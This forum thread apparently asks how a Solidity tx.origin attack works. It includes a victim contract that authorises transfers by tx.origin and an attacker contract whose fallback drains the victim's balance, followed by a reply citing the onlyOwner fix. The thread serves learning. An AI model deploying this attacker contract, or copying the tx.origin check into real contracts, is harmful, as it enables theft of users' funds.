What is the purpose of Interface and what is TxOriginVictim(msg.sender)?

I have two contracts in the context of tx.origin Vulnerability:

pragma solidity ^0.5.8;
contract TxOriginVictim {
   address owner;
   constructor() public{  
      owner = msg.sender;
   }
   function transferTo(address to, uint amount) public {  
      require(tx.origin == owner);  
      (bool success,) = to.call.value(amount)("");
      require(success);
   }
   function() external payable  {}
}

==and the attacker’s contracts is:

pragma solidity ^0.5.8;
interface TxOriginVictim {  
   function transferTo(address to, uint amount) external;
}

contract TxOriginAttacker {
   address owner;
   constructor () public {  owner = msg.sender;}
   function getOwner() public returns (address) {  return owner;}
   function() external payable  {  
      TxOriginVictim(msg.sender).transferTo(owner, msg.sender.balance);
   }
}

In the TxOriginAttacker contract, I can’t understand the purpose of TxOriginVictim’s interface. What is TxOriginVictim(msg.sender) in the statement:
TxOriginVictim(msg.sender).transferTo(owner, msg.sender.balance);

Please guide me.

1 Like

Hi @zak100,

Where is this example from? You may want to check with the author, unless someone in the community answers.

1 Like

Hi,
Thanks for your response:

Zulfi.

Was this answer not correct?

It’s illustrating a vulnerability in using tx.origin

Which is why in modern solidity development we use

modifier onlyOwner() {
        require(ownerOfToken == _msgSender(), "Ownable: caller is not the owner");  // Throws if called by any account other than the owner.
        _;      // when using a modifier, the code from the function is inserted here. // if multiple modifiers then the previous one inherits the next one's modifier code
    }
~

from Ownable.sol

Hi,
Thanks. StackExchange provided answer to my question and I feel it was correct.

Zulfi.